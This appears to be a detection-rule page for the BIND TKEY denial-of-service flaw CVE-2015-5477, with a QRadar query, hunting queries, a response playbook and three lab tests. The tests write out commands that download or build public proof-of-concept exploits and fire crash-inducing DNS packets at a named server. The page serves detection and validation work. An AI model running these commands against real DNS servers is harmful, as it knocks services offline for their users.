CVE-2015-5477 IBM QRadar · QRadar

Detect ISC BIND named TKEY Query Remote Denial of Service (CVE-2015-5477) in IBM QRadar

Detects exploitation of CVE-2015-5477, a critical data-processing error in ISC BIND's handling of TKEY queries. A remote, unauthenticated attacker can send a specially crafted DNS packet containing a TKEY record that triggers a REQUIRE assertion failure in named (buffer.c / db.c), causing the daemon to exit (INSIST/REQUIRE assertion). Because a single malformed packet crashes named, this is a trivially weaponizable remote DoS against any recursive or authoritative BIND server. Detection focuses on DNS TKEY query records (qtype 249) directed at named, correlated with abnormal named process termination / assertion-failure log lines and service restarts. Listed in CISA KEV.

MITRE ATT&CK

Tactic
Impact

QRadar Detection Query

IBM QRadar (QRadar)
sql
SELECT QIDNAME(qid) AS event, sourceip, destinationip, "DNS Query Type" AS qtype, DATEFORMAT(starttime,'yyyy-MM-dd HH:mm:ss') AS time
FROM events
WHERE (LOGSOURCETYPENAME(devicetype) ILIKE '%DNS%' OR "Process Name" = 'named')
  AND ( "DNS Query Type" = '249' OR "DNS Query Type" ILIKE 'TKEY'
        OR UTF8(payload) ILIKE '%assertion failure%'
        OR UTF8(payload) ILIKE '%RUNTIME_CHECK%buffer.c%' )
  AND starttime > NOW() - 1 HOURS
ORDER BY starttime DESC
high severity medium confidence

Returns DNS events with TKEY query type (249) and named assertion-failure payloads, enabling manual correlation of CVE-2015-5477 exploitation attempts and resulting crashes.

Data Sources

DNS flow/event logsLinux OS syslog (named)

Required Tables

events

False Positives & Tuning

  • GSS-TSIG dynamic DNS update traffic using TKEY.
  • Vulnerability scanner probes from authorized sources.
  • named restarts from maintenance captured in payload.

Other platforms for CVE-2015-5477


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Send malformed TKEY query to named (PoC tkill)

    Expected signal: Inbound DNS packet with a TKEY (qtype 249) record to port 53; named log line 'buffer.c:... REQUIRE(...) failed' followed by 'exiting (due to fatal error)'.

  2. Test 2Craft TKEY query with scapy

    Expected signal: DNS query event with query_type=TKEY/249 captured in BIND query log or network DNS sensor.

  3. Test 3Exploit-DB PoC 37721 TKEY assertion crash

    Expected signal: TKEY DNS query to the target; named assertion-failure entry and process termination in system logs.


Response Playbook

Triage

  1. Confirm whether the affected host runs ISC BIND (named) and verify its version against the ISC advisory AA-01272; BIND 9.1.0 through 9.9.7-P1 and 9.10.x before 9.10.2-P2 are vulnerable.
  2. Review named logs (/var/log/messages, journalctl -u named) for 'REQUIRE', 'assertion failure', 'buffer.c', or 'exiting (due to fatal error)' entries and correlate their timestamps with inbound TKEY (qtype 249) queries.
  3. Identify the source IP(s) of the TKEY queries from DNS query logs or packet capture and determine whether they are internal (possible GSS-TSIG) or external/untrusted.
  4. Determine whether named terminated and whether a supervisor (systemd/monit) auto-restarted it, indicating a crash-loop DoS pattern.

Containment

  1. Apply the ISC patch / upgrade named to a fixed release (9.9.7-P2, 9.10.2-P3, or later) on all affected servers.
  2. As an interim mitigation, block or rate-limit inbound DNS packets containing TKEY records at the perimeter firewall/IPS and restrict recursion to trusted clients.
  3. If a crash-loop is active, place the resolver behind a redundant/failover DNS service to maintain availability while patching.

Evidence Collection

  1. Capture the raw malicious packet(s) via tcpdump (e.g. 'tcpdump -i any -w tkey.pcap port 53') for the offending source IP and preserve the pcap.
  2. Collect named logs, the core dump (if coredumps enabled), and systemd/service restart timestamps for the incident window.

Escalation Criteria

  • !TKEY-triggered named crashes observed from untrusted/external source IPs, confirming active exploitation of CVE-2015-5477.
  • !Repeated crash-restart cycles causing sustained DNS outage, or exploitation targeting internet-facing authoritative/recursive servers.

Investigation Guide

Related Techniques

Forensic Artifacts

  • >named syslog/journal entries containing 'REQUIRE ... failed' / 'assertion failure' referencing buffer.c or db.c.
  • >Packet capture of the inbound DNS query bearing a TKEY (type 249) record.
  • >named process exit codes and systemd restart records in journalctl.

Tuning Guidance

In Active Directory / Kerberos environments, TKEY is used legitimately for GSS-TSIG secure dynamic updates, so alert only when TKEY queries coincide with named assertion failures/crashes or originate from untrusted source IPs. Allow-list known DDNS update clients and internal domain controllers. Once all named instances are confirmed patched to a fixed release, downgrade severity to informational and retain the hunting query for regression monitoring.


Hunting Queries

Surfaces all hosts receiving TKEY (qtype 249) DNS queries and the source IPs sending them over the past week to baseline legitimate GSS-TSIG use versus anomalous probes.

Hunting — KQL
kql
DnsEvents | where TimeGenerated > ago(7d) | where QueryType =~ "TKEY" or QueryType == "249" | summarize count() by ClientIP, Computer, bin(TimeGenerated, 1h) | sort by count_ desc
Hunting — SPL
spl
index=dns sourcetype="isc:bind:query" (query_type="TKEY" OR query_type="249") | stats count by src_ip, host | sort - count

Atomic Red Team Tests

Test 1 Send malformed TKEY query to named (PoC tkill)
linux

Uses the public CVE-2015-5477 proof-of-concept to send a crafted TKEY DNS query that triggers a REQUIRE assertion failure in a vulnerable BIND named instance. LAB ONLY against an authorized vulnerable server.

Command

bash
git clone https://github.com/robertdavidgraham/cve-2015-5477 /tmp/cve-2015-5477 && cd /tmp/cve-2015-5477 && make && ./tkill 127.0.0.1 53

Cleanup

bash
rm -rf /tmp/cve-2015-5477; systemctl restart named 2>/dev/null || service named restart 2>/dev/null

Expected Telemetry

Inbound DNS packet with a TKEY (qtype 249) record to port 53; named log line 'buffer.c:... REQUIRE(...) failed' followed by 'exiting (due to fatal error)'.

Expected Detection

KQL/SPL correlation rule fires on TKEY query co-occurring with named assertion-failure/crash within the 5-minute window.

Test 2 Craft TKEY query with scapy
linux

Constructs and sends a DNS query containing a TKEY record using scapy to generate TKEY telemetry (qtype 249) for detection validation. Against a vulnerable named this crashes the service.

Command

bash
python3 -c "from scapy.all import *; pkt=IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname='attacker.example',qtype=249)); send(pkt)"

Cleanup

bash
systemctl restart named 2>/dev/null || service named restart 2>/dev/null

Expected Telemetry

DNS query event with query_type=TKEY/249 captured in BIND query log or network DNS sensor.

Expected Detection

Detection rule records the TKEY query; if named terminates, the crash-correlation branch escalates the alert.

Test 3 Exploit-DB PoC 37721 TKEY assertion crash
linux

Runs the Exploit-DB 37721 proof-of-concept against an authorized lab BIND server to reproduce the CVE-2015-5477 remote DoS and validate crash telemetry.

Command

bash
curl -s https://www.exploit-db.com/raw/37721 -o /tmp/37721.py && python2 /tmp/37721.py 127.0.0.1

Cleanup

bash
rm -f /tmp/37721.py; systemctl restart named 2>/dev/null || service named restart 2>/dev/null

Expected Telemetry

TKEY DNS query to the target; named assertion-failure entry and process termination in system logs.

Expected Detection

Correlation detection flags the TKEY-query-plus-named-crash sequence as critical CVE-2015-5477 exploitation.

Related Detections

Tactic Hub